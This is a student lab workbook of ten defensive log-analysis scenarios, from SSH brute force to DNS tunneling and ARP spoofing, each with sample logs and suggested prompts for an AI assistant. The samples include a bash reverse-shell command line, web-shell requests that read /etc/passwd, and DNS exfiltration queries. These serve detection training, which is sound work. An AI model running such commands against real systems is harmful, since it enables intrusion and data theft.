Student Workbook: 10 Cybersecurity Practice Scenarios

Welcome to the hands-on lab sheet! For each scenario, analyze the log snippet or image provided, attempt to answer the questions on your own, or feed the details into an AI assistant (like Claude, Gemini, or ChatGPT) using the suggested prompts.

🛡️ Scenario 1: The Midnight Intruder (SSH Brute Force)

Tools involved: Linux Auth Logs / Wazuh Task: Figure out what type of network activity occurred on the Linux server and whether the attacker succeeded.

SSH Brute Force Logs

Jun 24 02:11:01 server1 sshd[1245]: Failed password for invalid user admin from 192.168.1.182 port 49281 ssh2
Jun 24 02:11:03 server1 sshd[1247]: Failed password for invalid user admin from 192.168.1.182 port 49286 ssh2
Jun 24 02:11:05 server1 sshd[1251]: Failed password for root from 192.168.1.182 port 49290 ssh2
Jun 24 02:11:08 server1 sshd[1255]: Accepted password for root from 192.168.1.182 port 49298 ssh2

[!TIP] Prompt for AI: "Explain these auth logs. What type of attack is happening? Did the attack succeed, and if so, at what timestamp and user account?"

🛡️ Scenario 2: The Shadow Modification (File Integrity Monitoring)

Tools involved: Wazuh FIM Task: An alert has popped up on your SIEM. Identify which critical operating system file was modified.

FIM Shadow Modification

{"syscheck":{"path":"/etc/shadow","event":"modified","size_after":1204,"md5_after":"9d8b7a6c5e4d3c2b1a0f9e8d7c6b5a4","uname_after":"root","gname_after":"shadow"}}

[!TIP] Prompt for AI: "I received a Wazuh syscheck alert for the file path '/etc/shadow'. Explain what this file is on Linux, what the 'modified' event means, and why this represents a major security risk."

🔍 Scenario 3: The Secret Channel (DNS Tunneling)

Tools involved: Wireshark / Network Logs Task: Analyze the network capture queries. Does this traffic look like normal internet browsing?

DNS Tunneling Packet Capture

Query 1: 7a6664673839326b6a6866647361.exfil.maliciousdomain.com - Type: TXT
Query 2: 6b6a6b6a6e627663787a6c6b6a68.exfil.maliciousdomain.com - Type: TXT
Query 3: 71776572747975696f7061736466.exfil.maliciousdomain.com - Type: TXT

[!TIP] Prompt for AI: "I am reviewing Wireshark captures of DNS queries and see multiple requests formatted with long, random alphanumeric characters querying TXT records on a subdomain 'exfil.maliciousdomain.com'. Is this normal? What security technique could this represent?"

🔍 Scenario 4: Whispering in the Dark (HTTP Cleartext Leak)

Tools involved: Wireshark HTTP Capture Task: Identify the information exposed over the network because the website didn't use encryption.

Cleartext HTTP Leak

POST /login.php HTTP/1.1
Host: insecure-portal.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

username=super_admin&password=Password123%21

[!TIP] Prompt for AI: "Here is an HTTP packet payload captured in Wireshark. Explain what protocol is in use, what data was sent, why this is unsafe, and how the network administrator should fix this vulnerability."

🛡️ Scenario 5: Knocking on Every Door (Port Scan)

Tools involved: Wazuh / Firewall Logs Task: Figure out what the external device is trying to do by scanning different ports.

Port Scan Log

2026-06-24 04:30:01 BLOCK 192.168.10.45:51230 -> 10.0.5.12:21 TCP SYN
2026-06-24 04:30:02 BLOCK 192.168.10.45:51231 -> 10.0.5.12:22 TCP SYN
2026-06-24 04:30:02 BLOCK 192.168.10.45:51232 -> 10.0.5.12:23 TCP SYN
2026-06-24 04:30:03 BLOCK 192.168.10.45:51233 -> 10.0.5.12:80 TCP SYN
2026-06-24 04:30:03 BLOCK 192.168.10.45:51234 -> 10.0.5.12:443 TCP SYN

[!TIP] Prompt for AI: "Explain this firewall log. Why is one IP address sending SYN packets to consecutive destination ports in a matter of seconds, and what is the attacker attempting to find out?"

🛡️ Scenario 6: The Infected Executable (VirusTotal Match)

Tools involved: Wazuh SIEM & VirusTotal Integration Task: Assess the threat level of the downloaded script.

VirusTotal Threat Screen

{"virustotal":{"found":1,"malicious":12,"positives":12,"scan_date":"2026-06-24","permalink":"https://virustotal.com"},"file":"/tmp/suspicious_script.sh"}

[!TIP] Prompt for AI: "My Wazuh agent detected a file at '/tmp/suspicious_script.sh' and triggered a VirusTotal integration match showing 12 positive detections. What does this mean? Should I delete it, and how should I investigate further?"

🔍 Scenario 7: The Duplicate Identity (ARP Spoofing)

Tools involved: Wireshark Expert Info Task: Find out why Wireshark is warning you about duplicate MAC addresses.

ARP Spoofing Wireshark

Warning: Duplicate IP address configured for 192.168.1.1 (00:0c:29:4f:8e:12) - also claimed by 00:0c:29:ab:cd:ef

[!TIP] Prompt for AI: "Wireshark shows an Expert Info warning: 'Duplicate IP address configured'. Both MAC address 00:0c:29:4f:8e:12 and 00:0c:29:ab:cd:ef are claiming to be the gateway IP 192.168.1.1. What network attack is this?"

🛡️ Scenario 8: The Backdoor Command (Web Shell Execution)

Tools involved: Web Server Access Logs Task: Spot the suspicious HTTP request in the Apache access logs.

Web Server Access Logs

192.168.5.10 - - [24/Jun/2026:05:00:23 +0000] "GET /index.php HTTP/1.1" 200 4502
192.168.5.10 - - [24/Jun/2026:05:01:45 +0000] "POST /uploads/cmd.php?cmd=whoami HTTP/1.1" 200 15
192.168.5.10 - - [24/Jun/2026:05:02:10 +0000] "POST /uploads/cmd.php?cmd=cat+/etc/passwd HTTP/1.1" 200 2405

[!TIP] Prompt for AI: "Look at these web server logs. Explain the difference between the first request and the last two. What is 'cmd.php?cmd=whoami' trying to achieve?"

🔍 Scenario 9: The Imposter Gateway (Rogue DHCP Server)

Tools involved: Wireshark DHCP Packets Task: Check if the network's DHCP settings have been hijacked by a rogue server.

Rogue DHCP Offer

DHCP Offer Packet Info:
  Server Identifier (DHCP IP): 192.168.1.250
  Router (Gateway IP Offered): 192.168.1.250 (Expected gateway is 192.168.1.1)

[!TIP] Prompt for AI: "During a Wireshark capture of DHCP traffic, I see a DHCP Offer where the server IP and the suggested default router are 192.168.1.250, but my legitimate router is 192.168.1.1. Explain rogue DHCP servers and what threat this poses."

🛡️ Scenario 10: The Rogue Spawn (Suspicious Child Process)

Tools involved: Wazuh / OS Sysmon Logs Task: Determine if the web server has been compromised based on the process parent-child relationship.

Web Server Process Spawning shell

{
  "event": "Process Creation",
  "parent_process": "/usr/sbin/nginx",
  "child_process": "/bin/bash",
  "command_line": "/bin/bash -i >& /dev/tcp/203.0.113.50/4444 0>&1"
}

[!TIP] Prompt for AI: "Explain this Process Creation log. A web server process (nginx) has spawned a shell (/bin/bash) with command arguments '/bin/bash -i >& /dev/tcp/203.0.113.50/4444 0>&1'. What is this command doing?"